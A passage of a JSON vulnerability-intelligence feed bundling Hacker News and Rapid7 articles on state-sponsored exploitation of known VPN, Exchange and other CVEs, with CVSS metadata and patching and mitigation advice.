\n \nOver the past 12 months, the victims were identified through sources such as [Shodan](<https://www.shodan.io/>), the Common Vulnerabilities and Exposure ([CVE](<https://cve.mitre.org/>)) database, and the National Vulnerabilities Database (NVD), exploiting the public release of a vulnerability to pick vulnerable targets and further their motives. \n \nBy compromising legitimate websites and leveraging spear-phishing emails with malicious links pointing to attacker-owned sites in order to gain initial access, the Chinese threat actors have deployed open-source tools such as [Cobalt Strike](<https://www.cobaltstrike.com/>), [China Chopper Web Shell](<https://blog.talosintelligence.com/2019/08/china-chopper-still-active-9-years-later.html>), and [Mimikatz](<https://github.com/gentilkiwi/mimikatz>) credential stealer to extract sensitive information from infected systems. \n \nThat's not all. Taking advantage of the fact that organizations aren't quickly mitigating known software vulnerabilities, the state-sponsored attackers are \"targeting, scanning, and probing\" US government networks for unpatched flaws in F5 Networks Big-IP Traffic Management User Interface ([CVE-2020-5902](<https://support.f5.com/csp/article/K52145254>)), Citrix VPN ([CVE-2019-19781](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>)), Pulse Secure VPN ([CVE-2019-11510](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101>)), and Microsoft Exchange Servers ([CVE-2020-0688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>)) to compromise targets. \n \n\"Cyber threat actors also continue to identify large repositories of credentials that are available on the internet to enable brute-force attacks,\" the agency said. 
\"While this sort of activity is not a direct result of the exploitation of emergent vulnerabilities, it demonstrates that cyber threat actors can effectively use available open-source information to accomplish their goals.\" \n \nThis is not the first time Chinese actors have worked on behalf of China's MSS to infiltrate various industries across the US and other countries. \n \nIn July, the US Department of Justice (DoJ) [charged two Chinese nationals](<https://thehackernews.com/2020/07/chinese-hackers-covid19.html>) for their alleged involvement in a decade-long hacking spree spanning high tech manufacturing, industrial engineering, defense, educational, gaming software, and pharmaceutical sectors with an aim to steal trade secrets and confidential business information. \n \nBut it's not just China. Earlier this year, Israeli security firm ClearSky uncovered a cyberespionage campaign dubbed \"[Fox Kitten](<https://thehackernews.com/2020/02/iranian-hackers-vpn-vulnerabilities.html>)\" that targeted government, aviation, oil and gas, and security companies by exploiting unpatched VPN vulnerabilities to penetrate and steal information from target companies, prompting CISA to issue [multiple security alerts](<https://thehackernews.com/2020/04/pulse-secure-vpn-vulnerability.html>) urging businesses to secure their VPN environments. 
\n \nStating that sophisticated cyber threat actors will continue to use open-source resources and tools to single out networks with a low security posture, CISA has recommended that organizations patch [routinely exploited vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a>), and \"audit their configuration and patch management programs to ensure they can track and mitigate emerging threats.\"\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-15T09:14:00", "type": "thn", "title": "CISA: Chinese Hackers Exploiting Unpatched Devices to Target U.S. Agencies", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-0688", "CVE-2020-5902"], "modified": "2020-09-15T09:14:30", "id": "THN:0E6CD47141AAF54903BD6C1F9BD96F44", "href": "https://thehackernews.com/2020/09/chinese-hackers-agencies.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:44", "description": 
"\n\nAmid renewed tensions between the U.S. and Russia over [Ukraine](<https://apnews.com/article/joe-biden-europe-russia-ukraine-geneva-090d1bd24f7ced8ab84907a9ed031878>) and [Kazakhstan](<https://thehill.com/policy/international/588860-tensions-between-us-russia-rise-over-military-involvement-in-kazakhstan>), American cybersecurity and intelligence agencies on Tuesday released a joint advisory on how to detect, respond to, and mitigate cyberattacks orchestrated by Russian state-sponsored actors.\n\nTo that end, the Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), and National Security Agency (NSA) have laid bare the tactics, techniques, and procedures (TTPs) adopted by the adversaries, including spear-phishing, brute-force, and [exploiting known vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) to gain initial access to target networks.\n\nThe list of flaws exploited by Russian hacking groups to gain an initial foothold, which the agencies said are \"common but effective,\" is below \u2014\n\n * [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) (FortiGate VPNs)\n * [CVE-2019-1653](<https://nvd.nist.gov/vuln/detail/CVE-2019-1653>) (Cisco router)\n * [CVE-2019-2725](<https://nvd.nist.gov/vuln/detail/CVE-2019-2725>) (Oracle WebLogic Server)\n * [CVE-2019-7609](<https://nvd.nist.gov/vuln/detail/CVE-2019-7609>) (Kibana)\n * [CVE-2019-9670](<https://nvd.nist.gov/vuln/detail/CVE-2019-9670>) (Zimbra software)\n * [CVE-2019-10149](<https://nvd.nist.gov/vuln/detail/CVE-2019-10149>) (Exim Simple Mail Transfer Protocol)\n * [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) (Pulse Secure)\n * 
[CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) (Citrix)\n * [CVE-2020-0688](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>) (Microsoft Exchange)\n * [CVE-2020-4006](<https://nvd.nist.gov/vuln/detail/CVE-2020-4006>) (VMWare)\n * [CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>) (F5 Big-IP)\n * [CVE-2020-14882](<https://nvd.nist.gov/vuln/detail/CVE-2020-14882>) (Oracle WebLogic)\n * [CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>) (Microsoft Exchange, exploited frequently alongside [CVE-2021-26857](<https://nvd.nist.gov/vuln/detail/CVE-2021-26857>), [CVE-2021-26858](<https://nvd.nist.gov/vuln/detail/CVE-2021-26858>), and [CVE-2021-27065](<https://nvd.nist.gov/vuln/detail/CVE-2021-27065>))\n\n\"Russian state-sponsored APT actors have also demonstrated sophisticated tradecraft and cyber capabilities by compromising third-party infrastructure, compromising third-party software, or developing and deploying custom malware,\" the agencies [said](<https://www.cisa.gov/uscert/ncas/current-activity/2022/01/11/cisa-fbi-and-nsa-release-cybersecurity-advisory-russian-cyber>).\n\n\"The actors have also demonstrated the ability to maintain persistent, undetected, long-term access in compromised environments \u2014 including cloud environments \u2014 by using legitimate credentials.\"\n\nRussian APT groups have been historically observed setting their sights on operational technology (OT) and industrial control systems (ICS) with the goal of deploying destructive malware, chief among them being the intrusion campaigns against Ukraine and the U.S. energy sector as well as attacks exploiting trojanized [SolarWinds Orion updates](<https://thehackernews.com/2021/12/solarwinds-hackers-targeting-government.html>) to breach the networks of U.S. 
government agencies.\n\nTo increase cyber resilience against this threat, the agencies recommend mandating multi-factor authentication for all users, looking out for signs of abnormal activity implying lateral movement, enforcing network segmentation, and keeping operating systems, applications, and firmware up to date.\n\n\"Consider using a centralized patch management system,\" the advisory reads. \"For OT networks, use a risk-based assessment strategy to determine the OT network assets and zones that should participate in the patch management program.\"\n\nOther recommended best practices are as follows \u2014\n\n * Implement robust log collection and retention\n * Require accounts to have strong passwords\n * Enable strong spam filters to prevent phishing emails from reaching end-users\n * Implement rigorous configuration management programs\n * Disable all unnecessary ports and protocols\n * Ensure OT hardware is in read-only mode\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-12T09:14:00", "type": "thn", "title": "FBI, NSA and CISA Warns of Russian Hackers Targeting Critical Infrastructure", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": 
"LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-10149", "CVE-2019-11510", "CVE-2019-1653", "CVE-2019-19781", "CVE-2019-2725", "CVE-2019-7609", "CVE-2019-9670", "CVE-2020-0688", "CVE-2020-14882", "CVE-2020-4006", "CVE-2020-5902", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2022-01-12T10:47:49", "id": "THN:3E9680853FA3A677106A8ED8B7AACBE6", "href": "https://thehackernews.com/2022/01/fbi-nsa-and-cisa-warns-of-russian.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:17", "description": "[](<https://thehackernews.com/images/-_sUoUckANJU/YQJlBsicySI/AAAAAAAADX0/BEDLvJhwqzYImk1o5ewZhnKeXxnoL0D0wCLcBGAsYHQ/s0/Security-Vulnerabilities.jpg>)\n\nIntelligence agencies in Australia, the U.K., and the U.S. issued a joint advisory on Wednesday detailing the most exploited vulnerabilities in 2020 and 2021, once again demonstrating how threat actors are able to swiftly weaponize publicly disclosed flaws to their advantage.\n\n\"Cyber actors continue to exploit publicly known\u2014and often dated\u2014software vulnerabilities against broad target sets, including public and private sector organizations worldwide,\" the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the Australian Cyber Security Centre (ACSC), the United Kingdom's National Cyber Security Centre (NCSC), and the U.S. 
Federal Bureau of Investigation (FBI) [noted](<https://us-cert.cisa.gov/ncas/alerts/aa21-209a>).\n\n\"However, entities worldwide can mitigate the vulnerabilities listed in this report by applying the available patches to their systems and implementing a centralized patch management system.\"\n\nThe top 30 vulnerabilities span a wide range of software, including remote work, virtual private networks (VPNs), and cloud-based technologies, that cover a broad spectrum of products from Microsoft, VMware, Pulse Secure, Fortinet, Accellion, Citrix, F5 Big IP, Atlassian, and Drupal.\n\nThe most routinely exploited flaws in 2020 are as follows -\n\n * [**CVE-2019-19781**](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) (CVSS score: 9.8) - Citrix Application Delivery Controller (ADC) and Gateway directory traversal vulnerability\n * [**CVE-2019-11510**](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) (CVSS score: 10.0) - Pulse Connect Secure arbitrary file reading vulnerability\n * [**CVE-2018-13379**](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) (CVSS score: 9.8) - Fortinet FortiOS path traversal vulnerability leading to system file leak\n * [**CVE-2020-5902**](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>) (CVSS score: 9.8) - F5 BIG-IP remote code execution vulnerability\n * [**CVE-2020-15505**](<https://nvd.nist.gov/vuln/detail/CVE-2020-15505>) (CVSS score: 9.8) - MobileIron Core & Connector remote code execution vulnerability\n * [**CVE-2020-0688**](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>) (CVSS score: 8.8) - Microsoft Exchange memory corruption vulnerability\n * [**CVE-2019-3396**](<https://nvd.nist.gov/vuln/detail/CVE-2019-3396>) (CVSS score: 9.8) - Atlassian Confluence Server remote code execution vulnerability\n * [**CVE-2017-11882**](<https://nvd.nist.gov/vuln/detail/CVE-2017-11882>) (CVSS score: 7.8) - Microsoft Office memory corruption vulnerability\n * [**CVE-2019-11580**](<https://nvd.nist.gov/vuln/detail/CVE-2019-11580>) (CVSS score: 
9.8) - Atlassian Crowd and Crowd Data Center remote code execution vulnerability\n * [**CVE-2018-7600**](<https://nvd.nist.gov/vuln/detail/CVE-2018-7600>) (CVSS score: 9.8) - Drupal remote code execution vulnerability\n * [**CVE-2019-18935**](<https://nvd.nist.gov/vuln/detail/CVE-2019-18935>) (CVSS score: 9.8) - Telerik .NET deserialization vulnerability resulting in remote code execution\n * [**CVE-2019-0604**](<https://nvd.nist.gov/vuln/detail/CVE-2019-0604>) (CVSS score: 9.8) - Microsoft SharePoint remote code execution vulnerability\n * [**CVE-2020-0787**](<https://nvd.nist.gov/vuln/detail/CVE-2020-0787>) (CVSS score: 7.8) - Windows Background Intelligent Transfer Service (BITS) elevation of privilege vulnerability\n * [**CVE-2020-1472**](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>) (CVSS score: 10.0) - Windows [Netlogon elevation of privilege](<https://thehackernews.com/2021/02/microsoft-issues-patches-for-in-wild-0.html>) vulnerability\n\nThe vulnerabilities that have come under active attack thus far in 2021 are listed below -\n\n * [Microsoft Exchange Server](<https://thehackernews.com/2021/03/urgent-4-actively-exploited-0-day-flaws.html>): [CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>), [CVE-2021-26857](<https://nvd.nist.gov/vuln/detail/CVE-2021-26857>), [CVE-2021-26858](<https://nvd.nist.gov/vuln/detail/CVE-2021-26858>), and [CVE-2021-27065](<https://nvd.nist.gov/vuln/detail/CVE-2021-27065>) (aka \"ProxyLogon\")\n * [Pulse Secure](<https://thehackernews.com/2021/05/new-high-severity-vulnerability.html>): [CVE-2021-22893](<https://nvd.nist.gov/vuln/detail/CVE-2021-22893>), [CVE-2021-22894](<https://nvd.nist.gov/vuln/detail/CVE-2021-22894>), [CVE-2021-22899](<https://nvd.nist.gov/vuln/detail/CVE-2021-22899>), and [CVE-2021-22900](<https://nvd.nist.gov/vuln/detail/CVE-2021-22900>)\n * [Accellion](<https://thehackernews.com/2021/03/extortion-gang-breaches-cybersecurity.html>): 
[CVE-2021-27101](<https://nvd.nist.gov/vuln/detail/CVE-2021-27101>), [CVE-2021-27102](<https://nvd.nist.gov/vuln/detail/CVE-2021-27102>), [CVE-2021-27103](<https://nvd.nist.gov/vuln/detail/CVE-2021-27103>), and [CVE-2021-27104](<https://nvd.nist.gov/vuln/detail/CVE-2021-27104>)\n * [VMware](<https://thehackernews.com/2021/06/alert-critical-rce-bug-in-vmware.html>): [CVE-2021-21985](<https://nvd.nist.gov/vuln/detail/CVE-2021-21985>)\n * Fortinet: [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>), [CVE-2020-12812](<https://nvd.nist.gov/vuln/detail/CVE-2020-12812>), and [CVE-2019-5591](<https://nvd.nist.gov/vuln/detail/CVE-2019-5591>)\n\nThe development also comes a week after MITRE [published](<https://cwe.mitre.org/top25/archive/2021/2021_cwe_top25.html>) a list of top 25 \"most dangerous\" software errors that could lead to serious vulnerabilities that could be exploited by an adversary to take control of an affected system, obtain sensitive information, or cause a denial-of-service condition.\n\n\"The advisory [...] puts the power in every organisation's hands to fix the most common vulnerabilities, such as unpatched VPN gateway devices,\" NCSC Director for Operations, Paul Chichester, [said](<https://www.ncsc.gov.uk/news/global-cyber-vulnerabilities-advice>), urging the need to prioritize patching to minimize the risk of being exploited by malicious actors.\n\n \n\n\nFound this article interesting? 
Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-07-29T08:21:00", "type": "thn", "title": "Top 30 Critical Security Vulnerabilities Most Exploited by Hackers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-13379", "CVE-2018-7600", "CVE-2019-0604", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-3396", "CVE-2019-5591", "CVE-2020-0688", "CVE-2020-0787", "CVE-2020-12812", "CVE-2020-1472", "CVE-2020-15505", "CVE-2020-5902", "CVE-2021-21985", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104"], "modified": "2021-08-04T09:03:14", "id": "THN:B95DC27A89565323F0F8E6350D24D801", "href": "https://thehackernews.com/2021/07/top-30-critical-security.html", 
"cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "rapid7blog": [{"lastseen": "2022-02-25T03:28:00", "description": "\n\nNow that [Russia has begun its armed invasion of Ukraine](<https://www.axios.com/putin-delares-war-on-ukraine-5a28dbd5-362f-4e97-91e1-84272f7390fd.html>), we should expect increasing risks of cybersecurity attacks and incidents, either as spillover from cyberattacks targeting Ukraine or direct attacks against actors supporting Ukraine.\n\nAny state-sponsored Russian attacks aiming to support the Russian invasion of Ukraine, or to retaliate for US, NATO, or other foreign measures taken in response to the Russian invasion of Ukraine, are most likely to be destructive or disruptive in nature rather than aiming to steal data. This blog discusses the types of attacks organizations may see \u2014 including distributed denial of service (DDoS), website defacements, and the use of ransomware or destructive malware \u2014 and recommends steps for their mitigation or remediation. \n\nAs we have [stated](<https://www.rapid7.com/blog/post/2022/02/15/prudent-cybersecurity-preparation-for-the-potential-russia-ukraine-conflict/>) before, we do not believe organizations need to panic. But as per guidance from numerous governments, we do believe it is wise to be extra vigilant at this time. Rapid7 will continue to monitor the cybersecurity risks, both internally and for our Managed Detection and Response (MDR) customers as the situation evolves. We will post updates as relevant and suggest subscription to our blog to see them as they are posted. \n\n\n## Malware\n\nOne of the most concerning possibilities is the risk of a destructive malware attack on the US, NATO members, or other foreign countries. 
This could take the form of a direct attack or spillover from an attack on Ukraine, such as the [2017 NotPetya operation that targeted Ukraine and spread to other parts of the globe](<https://www.rapid7.com/blog/post/2017/06/27/petya-ransomware-explained/>). Cybersecurity researchers have just discovered a new data wiping malware, dubbed HermeticWiper (AKA KillDisk.NCV), that infected hundreds of Ukrainian machines in the last two months. This seems to be a custom-written malware that corrupts the Master Boot Record (MBR), resulting in boot failure. This malware, like NotPetya, is intended to be destructive and will cripple the assets that it infects. \n\nAs always, the best malware prevention is to avoid infection in the first place \u2014 a risk we can minimize by ensuring that assets are up to date and use strong access controls, including multi-factor authentication. Additionally, it is crucial to have an incident response plan in place for the worst-case scenario, as well as a business continuity plan \u2014 including failover infrastructure if possible \u2014 for business-critical assets. \n\n\n## DDoS\n\nThere have already been [reports](<https://www.vice.com/en/article/v7dpbd/ukraines-military-banks-suffering-ddos-attacks>) of DDoS attacks on Ukrainian websites, and Russia has [historically](<https://cyberlaw.ccdcoe.org/wiki/Georgia-Russia_conflict_\\(2008\\)>) used DDoS in support of operations against other former Soviet republics, such as Georgia, in the past. Given this context, it is plausible that state-sponsored Russian actors would use DDoS if they choose to retaliate in response to measures taken against Russia for the invasion of Ukraine, such as sanctions or cyber operations from NATO countries. \n\nWhile DDoS does not receive the same level of attention as some other forms of attack, it can still have significant impacts to business operations. 
DDoS mitigations can include reduction of attack surface area via Content Distribution Networks or load balancers, as well as the use of Access Control Lists and firewalls to drop traffic coming from attacker nodes. \n\n\n## Phishing campaigns\n\nRussian state-sponsored actors are also well known for [engaging in spear-phishing attacks](<https://www.cisa.gov/uscert/ncas/alerts/TA18-074A>), specifically with compromised valid accounts. Defenders should ensure strong spam filtering and attachment scanning is in place. Educating end users of the dangers of phishing and regularly running phishing campaigns will also help mitigate this issue.\n\nState-sponsored, APT-style groups are not the only relevant threats. In times of crisis, it is common to see phishing attacks linking to malicious websites masquerading as news, aid groups, or other seemingly relevant content. Opportunistic scammers and other bad actors will attempt to take advantage of our human nature when curiosity, anxiety, and desire to help can make people less suspicious. Remain vigilant and avoid clicking unknown links or opening attachments \u2014 basic cyber hygiene that can be forgotten when emotions run high. \n\n\n## Brute-force attacks\n\n[According to a report from the NSA, CISA, FBI, and NCSC](<https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF>), \u201cFrom mid-2019 through early 2021, Russian General Staff Main Intelligence Directorate (GRU) \u2026 conduct[ed] widespread, distributed, and anonymized brute-force access attempts against hundreds of government and private sector targets worldwide.\u201d GRU used the discovered credentials to gain access into networks and further used known vulnerabilities such as CVE-2020-0688 and CVE-2020-17144 to increase access.\n\nThe best mitigation for these types of attacks is to enable MFA on all systems. Minimize externally facing systems and ensure externally facing systems are fully patched. 
\n\n\n## Defacement\n\nUkraine has also been experiencing website defacements, which provide attackers with an opportunity to spread messaging. Website defacement is typically associated with hacktivist activity, but state-sponsored Russian actors could pose as hacktivists in order to disguise Russian state involvement, and spread their strategic communication themes to international audiences by defacing Western websites. \n\nWebsite defacement often occurs as a result of weak passwords for admin accounts, cross-site scripting, injection, file upload, or vulnerable plugins. This can be managed by limiting the level of access accounts have and enforcing strong passwords. Additionally, looking for places where scripts or iframes could be injected or where SQL injection could occur can help identify vulnerabilities to remediate. \n\n\n## Ransomware\n\nRansomware could also be used to disrupt foreign targets. Criminals based in Russia were [believed](<https://thehill.com/homenews/administration/589850-biden-administration-says-russia-arrested-colonial-pipeline-hacker>) to be behind the 2021 ransomware attack on Colonial Pipeline in the United States. Ransomware can have disruptive effects on targets, and the attackers could simply refrain from decrypting files, even if they receive ransom payments, in order to maximize and extend the disruptive impact on victims. Additionally, opportunistic attackers who are actually looking for ransoms will still be on the prowl, and are likely to take advantage of the chaos. 
\n\nTo this end, defenders should:\n\n * Evaluate asset and application configurations to ensure resilience\n * Double-check visibility into the functioning of business-critical assets\n * Assess incident response processes in the case of an incident \n\n\n## What else should you be doing?\n\nThe following activities are mission-critical in times of uncertainty, but they are also best practices in general.\n\n * **Continuous monitoring: **Reinforce cybersecurity measures and staff during nights, weekends, and holidays. Threat actors are known to target their victims when there are gaps in \u201ceyes on glass.\u201d\n * **Incident response plan:** Prepare a dedicated team with a detailed workflow and a contact person that will be available offline in case of a cybersecurity incident.\n * **Back up data:** Implement data backup procedures of the company networks and systems. Backup procedures should be conducted on a frequent, regular basis for immediate recovery. Also, be sure to store backups offline and check them regularly to ensure they have not been poisoned with malware.\n * **Reduce opportunities for attackers: **Identify exposures, vulnerabilities, and misconfigurations that can provide opportunities for attackers to gain a foothold in your environment, and apply relevant mitigations or patches. In particular, Russian operators are well known to exploit edge systems. The Cybersecurity and Infrastructure Security Agency (CISA) [recently put out an alert](<https://www.cisa.gov/uscert/ncas/alerts/aa22-011a>) listing 13 known vulnerabilities that Russian state-sponsored threat actors use to initially compromise networks. 
We recommend this as a starting point for focused patching and mitigation.\n * **Stay informed:** Follow the latest updates and recommendations provided by Rapid7, as well as governmental security entities in specific press releases/alerts from the [Ukraine CERT](<https://cert.gov.ua/>), [The Security Service of Ukraine (SSU)](<https://ssu.gov.ua/en>), and the [US CISA](<https://www.cisa.gov/uscert>).\n\nWe expect the situation to be fluid over the coming days and weeks, and security guidance and threats may also evolve as the conflict develops. The measures suggested in this blog will continue to be relevant, and we plan to provide additional information as needed. \n\nIn the meantime, you can also [check this blog](<https://www.rapid7.com/blog/post/2022/02/25/russia-ukraine-conflict-what-is-rapid7-doing-to-protect-my-organization/>) to see how Rapid7 can help you prepare for and respond to cyber attacks. We also recommend organizations check their government\u2019s cybersecurity website for guidance.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-25T01:31:27", "type": "rapid7blog", "title": "Staying Secure in a Global Cyber Conflict", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": 
"SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0688", "CVE-2020-17144"], "modified": "2022-02-25T01:31:27", "id": "RAPID7BLOG:CBD7A5DA1DAAE9DCFD01F104F4B1B5FB", "href": "https://blog.rapid7.com/2022/02/25/russia-ukraine-staying-secure-in-a-global-cyber-conflict/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-09-29T16:39:11", "description": "\n\nToday's topic is Exchange 2010, which reaches end of support (EoS) on Oct. 13, 2020, as well as a survey of other versions of Exchange and how well they are being kept up-to-date. During our work with [Project Sonar](<https://www.rapid7.com/research/project-sonar/>), we consistently see the use of old and EoS software on the internet. This is generally a cause for concern, because this typically means that vulnerabilities will not be fixed. It is also an indicator that the environment the software is running in has other security issues.\n\nThe key takeaways from this post are:\n\n * Organizations running Exchange 2010 and earlier should upgrade to supported technology as soon as possible.\n * Organizations running Exchange 2013 should begin planning to upgrade to newer technologies.\n * Statistically speaking, most organizations running any version of Exchange are missing updates for critical vulnerabilities.\n\nBefore I move on, I want to point out that our numbers here will be fairly accurate, but not perfect. This is due to a couple of factors: First, the method that we use to fingerprint Exchange OWA allows us to determine the Exchange version down to `<major version>.<minor version>.<build number>`, but we cannot see the revision. For example, for Exchange Server 2019 Cumulative Update (CU) 7, with the latest updates the build number is `15.2.721.2`, but we only see `15.2.721`. This means that we can tell that the server is running 2019 CU7, but we can't be sure whether this month's patches were installed. 
Second, and most frustrating, is that Microsoft's updates don't always adjust the version number shown by tooling. Even Microsoft's own Exchange Admin Center and `Get-ExchangeServer` command will report incorrect versions in many instances.\n\n## Exchange 2010: A decade of support ends\n\nJust under 11 years ago, Microsoft released Exchange 2010. On Tuesday, Oct. 13, 2020, Microsoft Exchange 2010 will reach [End of Support (EoS) status](<https://techcommunity.microsoft.com/t5/exchange-team-blog/microsoft-extending-end-of-support-for-exchange-server-2010-to/ba-p/753591>). Microsoft will not provide **any** updates, including security fixes, after this date. While the software will keep working after this date, a quick glance at the Exchange vulnerabilities announced in 2020 will quickly show the importance of security updates.\n\nIn March 2020, we used Project Sonar to measure the number of Exchange servers that might be vulnerable to [CVE-2020-0688](<https://blog.rapid7.com/2020/04/06/phishing-for-system-on-microsoft-exchange-cve-2020-0688/>). At that time, we found over 166,000 Exchange 2010 servers with internet-facing Outlook Web App (OWA) services. On Monday, Sept. 21, 2020, we looked again and found that while the numbers had decreased, there are still 139,771 OWA services.\n\n\n\nThat's a scary number of servers that will not receive security updates for any future vulnerabilities. Both scary and disappointing is the fact that 40,000 of these were already running unsupported versions of Exchange 2010. Nearly 54,000 of these have not been updated in six years!\n\n## Exchange 2007: Long past its expiration date\n\nSpeaking of software that hasn't seen updates in years, there are 16,577 Exchange 2007 servers with OWA on the public internet. This product has been out of support for over three years. 
